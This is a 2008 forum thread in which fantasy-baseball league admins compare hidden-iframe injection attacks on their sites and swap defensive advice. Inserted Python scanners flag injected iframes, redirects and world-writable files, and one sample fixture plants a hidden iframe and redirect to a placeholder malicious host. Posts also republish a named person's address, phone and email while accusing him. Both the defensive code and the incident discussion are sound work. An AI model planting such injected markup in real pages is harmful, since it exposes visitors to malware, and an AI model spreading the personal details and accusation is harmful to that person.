Old 11-15-2008, 06:17 PM   #1
gollum65
Hacker possibly targetting OOTP online leagues

This is a notice for all commissioners of OOTP online leagues to keep their ears and eyes open and make sure they have strict control over their websites.

Twice in this past week the website of the league that I commish has been attacked by the same hacker. It's quite a simple attack, and one that I've had no trouble undoing, but now I'm hearing that other leagues have suffered similar recent attacks. The "hacker" simply adds invisible links to your web pages; if browsed to, the invisible links embedded in your site direct the browser to a 2nd website that presumably attempts to load some sort of malware or trojan onto unsuspecting computers.

Plain and simple, this is bush league (to use a baseball metaphor). We're all supposedly just trying to enjoy a hobby, right? What purpose does it serve to cause mischief for our websites and GMs, other than to entertain the feeble mind of the attacker and annoy the hell out of everyone else? Do us all a favor. Go practice your "hacking" somewhere else.
Old 11-15-2008, 06:30 PM   #2
kq76
If it's the same thing as what the CBL went through a while ago, I don't think it's some fellow OOTPer. I think it's something any website with similar security holes might suffer. I never did figure out exactly how they were doing it (we ended up just going to a bare bones site for a little while), but I did find out that it wasn't limited to OOTP online leagues. Mind giving us more info, maybe a link to a thread on your board talking about it, so I can look into it further?
Old 11-15-2008, 06:33 PM   #3
Curtis
Quote:
Originally Posted by gollum65
What purpose does it serve to cause mischief for our websites and GMs, other than to entertain the feeble mind of the attacker and annoy the hell out of everyone else?
I'm not trying to downplay your completely justified anger, but isn't that the motive behind most vandals? As such, it's very easily understandable — which is not to say forgivable.
Old 11-15-2008, 06:40 PM   #4
gollum65
Quote:
Originally Posted by kq76
If it's the same thing as what CBL went through a while ago, I don't think it's some fellow OOTPer. I think it's something any website with similar security holes might suffer. I never did figure out exactly how they were doing it (we ended up just going to a bare bones site for a little while), but I did find out that it wasn't limited to OOTP online leagues. Mind giving us more info, maybe a link to a thread on your board talking about it, so I can look into it further?
The specific URLs mentioned in the CBL thread are different, but the method of the attacks appears to be identical. We haven't really discussed it a lot on my site as it just started happening this week.

Feel free to contact me if you want a couple of sample files I kept that have the edited code. commish(at)ashmaplebaseball.info

And yes Curtis, I realize that's why they do it. Just have to vent my frustration and annoyance somehow.
Old 11-15-2008, 07:18 PM   #5
kq76
Quote:
Originally Posted by gollum65
The specific URLs mentioned in the CBL thread are different, but the method of the attacks appears to be identical. We haven't really discussed it a lot on my site as it just started happening this week.

Feel free to contact me if you want a couple of sample files I kept that have the edited code. commish(at)ashmaplebaseball.info

And yes Curtis, I realize that's why they do it. Just have to vent my frustration and annoyance somehow.
Thanks.

May I ask what host you're using? We were using hostmonster.

I see that you're using SMF forums while we were using phpbb2.x forums. I thought that might have been where the hole was, but there have been cases of sites not using the same boards in the past so I doubt it.

It looks like you're just using simple html, not php like we and others were, so that's probably not the problem.

I'm now thinking it might be folder permissions, but I'll have to look into that topic a bit more. I may end up asking you to tell me yours. You can easily check it if you have ftp access.

I'll email you for those files, but if anybody else experiences the same problem feel free to email me some sample files at kq76 at hotmail.com. Please point out the offending code for me or at least detail what you see in your browser.

I'm no website security expert, but I like to think I know at least a tiny bit about the topic. Regardless, I'll ask in OT if there's anybody that can help us. When I thought it was just one or two leagues I didn't think it was that big of a deal, but if it's more, then I'd like to put this down immediately.

I would have recommended going to a single page site for a while, but yours looks so simple (no disrespect, I'm just saying it's likely not the problem) that there's no point. If it does happen again, just re-up your files and sooner or later they'll probably just move on to another site. I know, it's not the best of solutions, but unless we find better that's the only one I know of.
Old 11-15-2008, 07:40 PM   #6
rem
vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:

Quote:
I apologize for all the frustrating issues we've been having with the site and forums lately. I have been talking with Fidel almost nonstop these past couple days to try and figure out the problem. We believe the source of the security issues lies within Getch's Utilities so our next step is to contact him. We also found out who's doing this; his name is John Mohov. I have also contacted him to ask why he's doing it. If that name rings a bell for anyone, let me know.

Please work with me here on this issue, I've worked too hard on this league to let it fall apart because of this so please don't drop out, we're still going and hopefully we will get this fixed in a couple days. If you have any ideas of what I could do to make this situation easier on you guys, let me know.
I believe the commish is molarmite.
Old 11-15-2008, 07:48 PM   #7
kq76
Quote:
Originally Posted by remangiii
vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:

I believe the commish is molarmite.
Thanks. I'll PM both and ask them to add to this thread.

If the vMLB's problem was the exact same one that we had then I'm 100% positive it's not to do with Getch's utilities. How am I so sure? Because we didn't have Getch's utilities installed at the time. I didn't install it until well after and we haven't had the problem since.

EDIT: I should say, though, that Getch's and whatever the specific cause of ours was could possibly share the same vulnerability. I just don't want everyone going around saying, "oh, it's Getch's" if they don't really know for sure. Could be, but I'd hate for it to get that reputation if it's really not the cause. I'll ask fhomess and Solonor for their input as they seem to know it fairly well.
Old 11-15-2008, 08:19 PM   #8
Raderick
Quote:
Originally Posted by remangiii
vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:

I believe the commish is molarmite.
The name rings a bell for me.
Old 11-15-2008, 08:53 PM   #9
f.montoya
Four sites that I host were hit this past week, including vMLB. We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in its purpose. That is to say, instead of the cross site scripting sending you to a different site to download a file, Mambo and phpbb actually quit and displayed an error. But a few other sites were running older versions of Mambo and phpbb. These sites would actually do what the script wanted and a pdf file would open after a few seconds and a browser redirect.

The location of the pdf file was at fany008.net (this is the domain and I don't want to post the whole url to the pdf file here) which I later tracked to a Mr John Mohov. While I don't think this guy would actually be attacking sites himself, he is listed as the owner of fany008.net and has a responsibility to remove the infected pdf file from his server and take appropriate preventative security action.

I am listing what is already publicly available on Mr. Mohov here:

john mohov
Email: bryanlink AT live.com (I will do him the courtesy of protecting his email address from bots)
Organization: mohov ltd
Address: 2198 Bernard rd
City: New Vienna
State: oh
ZIP: 45159
Country: US
Phone: +7.4955123458
Fax:

Usually, these attacks are done via an html web form by wrapping malicious code in php tags in the text fields. Quite simple really. And php code can be used to overwrite, append and create files, which is what happened in this case. The script was used to create and overwrite the index.html files in about 50+ locations within Mambo and phpbb and it appended the index.php file to include the redirect command. Easy to find but a major pain to clean out.
__________________
Fidel Montoya
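As an added defensive example (not code from this thread, nor from Mambo, phpbb or any host mentioned here), the following Python script walks a web root and flags the two artifacts Fidel describes: an invisible iframe dropped into pages, and redirect code appended to index files. The sample tree it writes is constructed for the demonstration, and malicious-domain.example is a placeholder rather than the domain named in the thread.

```python
import os
import re
import tempfile
from pathlib import Path

# Markup matching what the posts describe: an iframe sized to nothing or hidden by
# CSS, and a redirect (PHP header(), JS location assignment, or a meta refresh).
IFRAME_RE = re.compile(
    r"<iframe[^>]*(?:width\s*[=:]\s*[\"']?0|height\s*[=:]\s*[\"']?0"
    r"|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>",
    re.IGNORECASE,
)
REDIRECT_RE = re.compile(
    r"(?:header\s*\(\s*[\"']Location:|window\.location(?:\.href)?\s*="
    r"|<meta[^>]+http-equiv\s*=\s*[\"']?refresh)",
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".html", ".htm", ".php"}


def find_injections(content):
    """Return a list of (kind, snippet) for suspicious markup in one file's text."""
    hits = [("hidden_iframe", m.group(0)[:120]) for m in IFRAME_RE.finditer(content)]
    hits += [("redirect", m.group(0)[:120]) for m in REDIRECT_RE.finditer(content)]
    return hits


def scan_webroot(root):
    """Walk root; return {relative posix path: hits} for every page with findings.

    A legitimate index.php may redirect on purpose, so 'redirect' hits are items to
    review rather than proof of compromise; a zero-size or hidden iframe rarely is.
    """
    root = Path(root)
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.suffix.lower() not in SCAN_SUFFIXES:
                continue
            try:
                content = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: skip it rather than abort the whole scan
            hits = find_injections(content)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


def build_sample_webroot(base=None):
    """Constructed sample: a clean page, a page with a hidden iframe, an index.php
    with an appended JS redirect, and a non-page file the scanner must ignore."""
    base = Path(base or tempfile.mkdtemp())
    (base / "infected").mkdir(exist_ok=True)
    (base / "forum").mkdir(exist_ok=True)
    clean = "<html><body><h1>League standings</h1></body></html>\n"
    (base / "index.html").write_text(clean)
    (base / "infected" / "index.html").write_text(
        clean + '<iframe src="http://malicious-domain.example/x.pdf" '
        'width="0" height="0" style="visibility:hidden"></iframe>\n'
    )
    (base / "forum" / "index.php").write_text(
        "<?php\n// legitimate forum bootstrap (placeholder)\n?>\n"
        '<script>window.location.href = "http://malicious-domain.example/x.pdf";</script>\n'
    )
    (base / "forum" / "notes.txt").write_text("<iframe width=0></iframe>\n")
    return base


if __name__ == "__main__":
    sample = build_sample_webroot()
    for rel, hits in sorted(scan_webroot(sample).items()):
        for kind, snippet in hits:
            print(f"{rel}: {kind}: {snippet}")
```

Run it against a copy of the site taken before any cleanup so the list of touched files can also be compared with the host's FTP or access logs.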
Old 11-15-2008, 09:20 PM   #10
molarmite
Fidel has basically explained everything I know so far. All I know is I can't keep my forum up for more than 10 minutes without this guy taking it down. I've had some other commissioners contact me as well with this same problem, AMBL commish was one of them. Is this something we should contact Markus, Steve, or Andreas about or can we take care of this ourselves?
Old 11-15-2008, 09:24 PM   #11
kq76
Quote:
Originally Posted by f.montoya
...

We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in its purpose.

...
Thanks. I just read a few articles on "iframe attacks" as that seems to be what this is commonly labeled, and it sounds as though there are countless ways that these attacks can be made (different CMSs, different forum software, even stuff like cPanel). When we first got it I of course thought it might be our phpbb forums (I know a bit about SQL injections and the like) as we were using an old phpbb2.x version instead of the latest phpbb3.x, but the forum pages weren't affected at all, only the main part of the site, so I thought it wasn't the forum. Thinking about it some more, however, I suppose it could have been our forum and somehow they used it to attack the rest of our site, but not the forum itself, maybe to throw us off of what the cause could be. Anyway, your experience leads me to believe this very well might be the case.

Anyway, to anybody out there who is running an outdated forum, CMS, or any other kind of website software, I highly recommend doing what Fidel did and upgrading it, even if you don't think that's the cause. It very well could prevent the problem. You should probably also notify your webhost as they should take a look at whether their stuff is up-to-date as well, but at the very least update whatever you can.
Old 11-15-2008, 09:27 PM   #12
kq76
Quote:
Originally Posted by molarmite
Fidel has basically explained everything I know so far. All I know is I can't keep my forum up for more than 10 minutes without this guy taking it down. I've had some other commissioners contact me as well with this same problem, AMBL commish was one of them. Is this something we should contact Markus, Steve, or Andreas about or can we take care of this ourselves?
I doubt it's got anything to do with OOTP stuff, but I'll PM them and ask. I think Andreas knows this stuff pretty well.
Old 11-15-2008, 09:47 PM   #13
Alan T
This probably doesn't have anything to do with OOTP at all, and you likely should talk to your service providers or if things get really bad the proper authorities for assistance.

Starting at some point last year, people started heavily using invisible iframes to inject trojans into people's computers. The way it worked is they would use some exploit on the web server or an application on that server to break in enough to post an additional iframe on the site's main page that no one would notice because it is invisible (no picture or anything). Everything that iframe did was behind the scenes, by instructing the user who browsed that webpage to go to some other compromised site and download an infected trojan.

I know a very common one was to utilize a RealPlayer exploit, where the iframe would have the user's browser download a file that would launch RealPlayer and make use of that exploit. There have been other recent ones that attack flaws in Adobe Acrobat Reader (.pdf files) and other applications.

Users who kept their RealPlayer, Adobe, OS, and other applications up to date usually were not infected by this, but most users are poor about keeping security patches for their OS or applications and they got infected from it.

I work for a company that develops anti-virus software, and there was a memo that went around in the spring that said there were over 200,000 infected sites using this type of attack and that number was growing extremely fast. phpbb was originally one of the targeted services that the attackers would use to put the initial iframe on the site. I am sure they have found other similar vulnerabilities in other scripts or programs.

As far as end users go, users that use Firefox with NoScript, for instance, are not fully protected, as by default NoScript allowed iframes. Those users should go into the NoScript settings and make sure to explicitly say not to allow iframes either (unless they override it). I am less familiar with Internet Explorer, but I understand there are ways to protect yourself there as well.

As for the server admins, that is tougher: you really need to look through the logs and find what they are actually exploiting to put the iframe up in the first place and shut that application down until you can upgrade to a fixed version.

Anyhow, I highly doubt this has anything to do with OOTP, and these attackers have just started getting to OOTP sites now. They used to hit MMORPG sites very heavily, especially the more heavily played ones (I don't play MMORPGs so can't give specifics on which games, I fear), but I know there were reports of this attack being used to steal MMORPG characters in Warcraft, which they would then sell, and other various things.

Sorry I don't have more help for you, but hoped by explaining the history of this type of attack, it might be able to provide you direction to fix it.
Old 11-15-2008, 09:49 PM   #14
Alan T
Quote:
Originally Posted by kq76
When we first got it I of course thought it might be our phpbb forums (I know a bit about SQL injections and the like) as we were using an old phpbb2.x version instead of the latest phpbb3.x, but the forum pages weren't affected at all, only the main part of the site, so I thought it wasn't the forum. Thinking about it some more, however, I suppose it could have been our forum and somehow they used it to attack the rest of our site, but not the forum itself, maybe to throw us off of what the cause could be.

I am not a software engineer, I am a network security engineer, so I don't really know the specifics on how these attacks are done code-wise, but I would say if you have an old version of phpbb that is not patched to fix this exploit, it is very likely they used this to insert the iframe into your main page. Even if they did not touch the forums at all, that is their normal behavior. They just want the malicious code in the very top level root directory for the web services on the main index page so it gets hit the most.
Old 11-16-2008, 12:28 AM   #15
gollum65
John Mohov indeed appears to be the culprit in my case. The fany08 domain is apparently registered to him, and that's what's embedded into my files.

To MY knowledge, this started a few weeks ago when the Suicide Squeeze league was attacked using a similar method, although you'd have to contact Lonnie Moody to find out for sure. He had to move his whole site to a new host.

My webhost is totalchoicehosting dot com and when I contacted them this morning, they advised me that my global permissions were set to allow files to be written, and they fixed the permissions for me. Time will tell if they were right. I've also changed all the website passwords as they directed.

Regarding my forum version, I was on SMF 1.16 till this morning. I updated to 1.17 today.
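Added here as an example, not something from the thread or from totalchoicehosting: a small Python audit for the condition gollum65's host reported, files and directories under the web root that any account on the server can write to. The 755/644 target modes are the usual shared-hosting defaults and an assumption, the sample tree it builds is constructed, and note that this only closes the world-write bit; it does nothing against code already running as the site's own user.

```python
import os
import stat
import tempfile
from pathlib import Path


def world_writable_entries(root):
    """Return sorted (relative posix path, octal mode) for every file or directory
    under root that carries the world-write bit (o+w). Symlinks are skipped because
    their own mode bits are not what the filesystem enforces."""
    root = Path(root)
    found = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = Path(dirpath) / name
            try:
                st = path.lstat()
            except OSError:
                continue  # vanished or unreadable entry: skip, do not abort the audit
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                found.append((path.relative_to(root).as_posix(),
                              oct(stat.S_IMODE(st.st_mode))))
    return sorted(found)


def recommended_mode(path):
    """Assumed shared-host defaults: directories 755, files 644."""
    return 0o755 if Path(path).is_dir() else 0o644


def tighten(root, dry_run=True):
    """Reset world-writable entries to the recommended mode.
    Returns (relative path, old mode, new mode) for each entry; with dry_run=True
    nothing is changed, so the list can be reviewed before it is applied."""
    changes = []
    for rel, old in world_writable_entries(root):
        path = Path(root) / rel
        new = recommended_mode(path)
        if not dry_run:
            path.chmod(new)
        changes.append((rel, old, oct(new)))
    return changes


def build_sample_webroot(base=None):
    """Constructed sample: a web root whose forum directory and one of its files
    were left world-writable, the misconfiguration the host described."""
    base = Path(base or tempfile.mkdtemp())
    (base / "forum").mkdir(exist_ok=True)
    (base / "index.html").write_text("<html>ok</html>\n")
    (base / "forum" / "index.php").write_text("<?php // forum ?>\n")
    (base / "index.html").chmod(0o644)
    (base / "forum" / "index.php").chmod(0o666)
    (base / "forum").chmod(0o777)
    return base


if __name__ == "__main__":
    sample = build_sample_webroot()
    for rel, old, new in tighten(sample, dry_run=True):
        print(f"{rel}: {old} -> {new}")
```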
Old 11-16-2008, 05:26 AM   #16
f.montoya
Quote:
Originally Posted by gollum65
John Mohov indeed appears to be the culprit in my case. The fany08 domain is apparently registered to him, and that's what's embedded into my files.

To MY knowledge, this started a few weeks ago when the Suicide Squeeze league was attacked using a similar method, although you'd have to contact Lonnie Moody to find out for sure. He had to move his whole site to a new host.

My webhost is totalchoicehosting dot com and when I contacted them this morning, they advised me that my global permissions were set to allow files to be written, and they fixed the permissions for me. Time will tell if they were right. I've also changed all the website passwords as they directed.

Regarding my forum version, I was on SMF 1.16 till this morning. I updated to 1.17 today.
While they gave you sound advice, you should also make sure they are running the latest version of php.

In addition, via the process of elimination, it appears that there was some sql injection and such code included a self timer which made the forums self destruct and recreated the iframes, even after cleaning out infected indexes from the directories. I was doing so nonstop for hours at one point. Now that I've removed the forum database, it appears all is calm.
Old 11-16-2008, 07:01 AM   #17
Raidergoo
New Vienna is about 50 minutes from here. I have a consulting visit to make in Harveysburg, just north of New Vienna, this week. I could make a criminal complaint.

Clinton County Sheriff Home

Nothing quite like having the local sheriff show up and ask a few questions.

If someone would like me to drive to the office and make the complaint, I could.
Old 11-16-2008, 08:18 AM   #18
Raidergoo
Quote:
Originally Posted by f.montoya
Four sites that I host were hit this past week, including vMLB. We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in its purpose. That is to say, instead of the cross site scripting sending you to a different site to download a file, Mambo and phpbb actually quit and displayed an error. But a few other sites were running older versions of Mambo and phpbb. These sites would actually do what the script wanted and a pdf file would open after a few seconds and a browser redirect.

The location of the pdf file was at fany008.net (this is the domain and I don't want to post the whole url to the pdf file here) which I later tracked to a Mr John Mohov. While I don't think this guy would actually be attacking sites himself, he is listed as the owner of fany008.net and has a responsibility to remove the infected pdf file from his server and take appropriate preventative security action.

I am listing what is already publicly available on Mr. Mohov here:

john mohov
Email: bryanlink AT live.com (I will do him the courtesy of protecting his email address from bots)
Organization: mohov ltd
Address: 2198 Bernard rd
City: New Vienna
State: oh
ZIP: 45159
Country: US
Phone: +7.4955123458
Fax:

The street address is to a farm. Here's a picture.

2198 Bernard rd New vienna OH - Google Maps

The country code on the phone number listed is 7, which is Russia, and area code is 495, which is Moscow, Russia.

Mohov is a Russian name.

A person in the state of Ohio would probably use a LLC to protect assets, not a limited partnership.

Old 11-16-2008, 08:33 AM   #19
gollum65
Fidel: Can you explain more about the sql injection? How do I find it? If it exists, what do I remove? I have no idea if I have anything like this or not. And I haven't run across any erroneous .pdf files on my site, so apparently I didn't get that part of the attack.

Raidergoo: While the attack on my site so far has been pretty minor and easy to fix, it certainly wouldn't upset me if a cop knocked on this guy's door. And going by what Fidel describes happening to his sites, he'd probably drive the cop himself.
Old 11-16-2008, 08:38 AM   #20
Raidergoo
Sadly, this does not seem to be a Clinton County script kiddie anymore.

I just contacted sysadmin AT cari.net, who hosts fany008.

One of the points behind using an email address like bryanlink AT live.com is that they are disposable.
